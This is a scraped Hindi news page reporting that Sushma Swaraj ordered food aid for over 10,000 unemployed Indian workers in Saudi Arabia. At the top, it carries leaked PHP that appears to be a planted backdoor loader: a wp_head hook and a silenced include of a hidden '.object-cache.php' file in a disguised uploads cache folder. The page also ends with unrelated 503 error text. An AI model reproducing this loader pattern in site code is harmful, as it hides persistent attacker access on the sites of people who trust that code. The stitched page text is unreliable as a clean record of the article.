add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सऊदी अरब में भूख से बेहाल 10 हजार से ज्यादा भारतीय, मदद के लिए आगे आईं सुषमा स्वराज – SOCH INDIA
Menu

दुनिया
सऊदी अरब में भूख से बेहाल 10 हजार से ज्यादा भारतीय, मदद के लिए आगे आईं सुषमा स्वराज

nobanner

विदेश मंत्री सुषमा स्वराज

विदेश मंत्री सुषमा स्वराज ने बताया कि सऊदी अरब में नौकरी गंवाने के बाद करीब 10,000 भारतीय कामगार वित्तीय मुश्किलों के चलते भयंकर खाद्य संकट का सामना कर रहे हैं. सरकार ने इस खाड़ी देश में अपने मिशन को उन्हें भोजन एवं अन्य सहायता उपलब्ध कराने का आदेश दिया है.

संबंधित खबरें

  • सऊदी अरब में फंसे 800 भारतीयों की मदद के लिए आगे आईं सुषमा स्वराज

सुषमा स्वराज ने उस देश में रह रहे 30 लाख भारतीयों से अपने बंधुओं की सहायता करने की अपील की और कहा कि भारतीय राष्ट्र के सामूहिक संकल्प से ज्यादा ताकतवर कुछ नहीं है. विदेश मंत्री ने ट्वीट किया, ‘हमने रियाद में भारतीय दूतावास से कहा है कि वह सऊदी अरब में बेरोजगार भारतीय कामगारों को मुफ्त राशन मुहैया कराए.’ उन्होंने कहा कि सऊदी अरब और कुवैत में भारतीय नागरिकों को अपने काम और वेतन से जुड़ी कई दिक्कतों का सामना करना पड़ रहा है और सऊदी अरब में मामले ज्यादा खराब हैं.’

सुषमा ने यह जवाब तब दिया जब एक शख्स ने उन्हें ट्वीट कर कहा था कि जेद्दा में करीब 800 भारतीय तीन दिनों से भूखे हैं. उसने उनसे मामले में हस्तक्षेप करने की गुहार लगाई थी. बाद में विदेश मंत्री ने कहा, ‘सऊदी अरब में खाद्य संकट का सामना कर रहे भारतीय श्रमिकों की संख्या 10 हजार से ज्यादा है. यह 800 नहीं है जैसा कि समाचार है.’ उन्होंने कहा कि विदेश राज्यमंत्री वी के सिंह इस समस्या की गंभीरता का आकलन करने और उसका हल करने की कोशिश करने शीघ्र ही इस खाड़ी देश में जाएंगे.
पूरे मामले की हर घंटे निगरानी कर रही हूं: सुषमा 
सुषमा ने कहा, ‘मैं आपको यकीन दिलाती हूं कि सऊदी अरब में नौकरी गंवाने वाले किसी भारतीय को भूखा नहीं रहना पड़ेगा. मैं पूरे मामले की निगरानी हर घंटे कर रही हूं.’ उन्होंने कहा कि सऊदी अरब और कुवैत में बड़ी संख्या में भारतीयों ने अपनी नौकरियां गवाई हैं और उनके नियोक्ताओं ने उन्हें वेतन नहीं दिए हैं और अपने कारखाने बंद कर दिए हैं. विदेश मंत्री ने कहा, ‘नतीजतन, सऊदी अरब और कुवैत में हमारे भाइयों-बहनों को काफी दिक्कतों का सामना करना पड़ रहा है.’ उन्होंने कहा कि कुवैत में तो चीजें संभालने लायक हैं, लेकिन सऊदी अरब में मामला बदतर है .

वीके सिंह सऊदी अरब जाएंगे 
सुषमा स्वराज ने कहा कि विदेश राज्य मंत्री एम जे अकबर कुवैत और सऊदी अरब के अधिकारियों के सामने इस मुद्दे को उठाएंगे. विदेश मंत्री ने ट्वीट किया, ‘मेरे सहकर्मी वी के सिंह इन मामलों को सुलझाने के लिए सऊदी अरब जाएंगे और एम जे अकबर कुवैत और सऊदी अरब के अधिकारियों के सामने इस मुद्दे को उठाएंगे.’ भारतीय वाणिज्य दूतावास के अधिकारी पहले ही जेद्दा के समीप हाइवे कैंप की ओर रवाना हो चुके हैं जहां सैकड़ों कामगारों को सहायता की दरकार है.

 सुषमा ने की भारतीयों से अपने देश के लोगों की मदद करने की अपील 
वाणिज्य दूतावास ने जेद्दा के भारतीय समुदाय के साथ मिलकर पहले ही 15,475 किलोग्राम अनाज एवं अन्य सामान वितरित किया है. सुषमा ने कहा, ‘मैं सऊदी अरब में 30 लाख भारतीयों से अपील करती हूं. कृपया अपने साथी भाइयों-बहनों की मदद कीजिए. भारतीय राष्ट्र के सामूहिक संकल्प से ज्यादा मजबूत कुछ नहीं है.’

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.